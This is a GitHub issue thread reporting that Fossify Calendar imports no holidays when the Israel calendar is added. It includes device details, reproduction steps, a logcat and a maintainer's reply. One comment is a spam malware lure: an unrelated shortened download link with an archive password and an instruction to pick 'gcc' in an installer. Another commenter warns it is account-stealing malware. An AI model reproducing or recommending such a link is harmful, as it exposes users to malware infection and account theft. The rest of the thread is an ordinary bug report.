### ISSUE TITLE
Adding Israel holiday calendar does not add any items

### ISSUE THREAD

**Issue by taivlam** [FossifyOrg/Calendar#310]
### Checklist

- [X] I can reproduce the bug with the latest version given [here](https://github.com/FossifyOrg/Calendar/releases/latest).
- [X] I made sure that there are **no existing issues** - [open](https://github.com/FossifyOrg/Calendar/issues) or [closed](https://github.com/FossifyOrg/Calendar/issues?q=is%3Aissue+is%3Aclosed) - to which I could contribute my information.
- [X] I made sure that there are **no existing discussions** - [open](https://github.com/FossifyOrg/Calendar/discussions) or [closed](https://github.com/FossifyOrg/Calendar/discussions?discussions_q=is%3Aclosed) - to which I could contribute my information.
- [X] I have read the FAQs inside the app (Menu -> About -> FAQs) and my problem isn't listed.
- [X] **I have taken the time to fill in all the required details. I understand that the bug report will be dismissed otherwise.**
- [X] This issue contains only one bug.
- [X] I have read and understood the [contribution guidelines](https://github.com/FossifyOrg/Calendar/blob/master/CONTRIBUTING.md).

### Affected app version

1.0.3

### Affected Android/Custom ROM version

Android 14 / GrapheneOS version 2024082200

### Affected device model

Pixel 5a (`barbet`)

### How did you install the app?

F-Droid / IzzyOnDroid

### Steps to reproduce the bug

1.  Tap on the 3 vertical dots button.
2.  Tap "Add holidays".
3.  Select "Israel".
4.  Tap "OK" when the "Event reminders" window appears.

### Expected behavior

I expect the Israeli holidays to be imported successfully.

### Actual behavior

Instead, Fossify Calendar only has a floating notification message (near the bottom of the screen) that states "Importing...", and then the next message says "No new items have been found".

### Screenshots/Screen recordings

https://github.com/user-attachments/assets/6725fabb-e498-4b1b-851a-2eb83aeee867

### This existed on Simple Calendar from Simple Mobile Tools
* First mentioned in May 2019
* See: SimpleMobileTools/Simple-Calendar#895
* Saved on the [Wayback Machine](https://web.archive.org/save/https://github.com/SimpleMobileTools/Simple-Calendar/issues/895) and [archive&period;today](https://archive.is/rx530)

### Log from app
```
type: logcat
osVersion: google/barbet/barbet:14/AP2A.240805.005/2024082200:user/release-keys
packageName: org.fossify.calendar:4
buffers: main,system,crash,events,kernel
level: verbose

--------- beginning of events
08-27 15:46:54.004 24092 24092 I wm_on_create_called: [Token=224112748,Component Name=org.fossify.calendar.activities.SplashActivity.Green,Reason=performCreate,time=20ms]
08-27 15:46:54.143 24092 24092 I wm_on_create_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=performCreate,time=114ms]
08-27 15:46:54.148 24092 24092 I wm_on_start_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=handleStartActivity,time=4ms]
08-27 15:46:54.166 24092 24092 I wm_on_resume_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=RESUME_ACTIVITY,time=16ms]
08-27 15:46:54.182 24092 24092 I wm_on_top_resumed_gained_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=topStateChangedWhenResumed]
08-27 15:46:54.273 24092 24092 I viewroot_draw_event: [window=VRI[MainActivity],event=reportDrawFinished seqId=0]
08-27 15:46:54.351 24092 24092 I wm_on_destroy_called: [Token=224112748,Component Name=org.fossify.calendar.activities.SplashActivity.Green,Reason=performDestroy,time=0ms]
08-27 15:47:12.616 24092 24092 I viewroot_draw_event: [window=VRI[PopupWindow:c7dd462],event=reportDrawFinished seqId=0]
08-27 15:47:12.635 24092 24092 I viewroot_draw_event: [window=VRI[PopupWindow:c7dd462],event=reportDrawFinished seqId=0]
08-27 15:47:15.160 24092 24092 I viewroot_draw_event: [window=VRI[MainActivity],event=reportDrawFinished seqId=0]
08-27 15:47:15.194 24092 24122 I viewroot_draw_event: [window=VRI[MainActivity],event=reportDrawFinished seqId=0]
08-27 15:47:19.530 24092 24092 I viewroot_draw_event: [window=VRI[MainActivity],event=reportDrawFinished seqId=0]
08-27 15:47:19.536 24092 24092 I viewroot_draw_event: [window=VRI[MainActivity],event=reportDrawFinished seqId=0]
08-27 15:47:32.050 24092 24092 I wm_on_top_resumed_lost_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=topStateChangedWhenResumed]
08-27 15:47:32.703 24092 24092 I wm_on_top_resumed_gained_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=topStateChangedWhenResumed]
08-27 15:47:33.681 24092 24092 I wm_on_top_resumed_lost_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=topStateChangedWhenResumed]
08-27 15:47:34.285 24092 24092 I wm_on_paused_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=performPause,time=1ms]
08-27 15:47:34.298 24092 24092 I wm_on_stop_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=STOP_ACTIVITY_ITEM,time=2ms]
08-27 15:47:34.306 24092 24092 I wm_on_destroy_called: [Token=138821762,Component Name=org.fossify.calendar.activities.MainActivity,Reason=performDestroy,time=3ms]
```

**Comment by caineblood** [comment]
that is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Aga-C** [comment]
In future releases we'll have automatically generated holidays for many countries, including Israel, so it should address this issue.
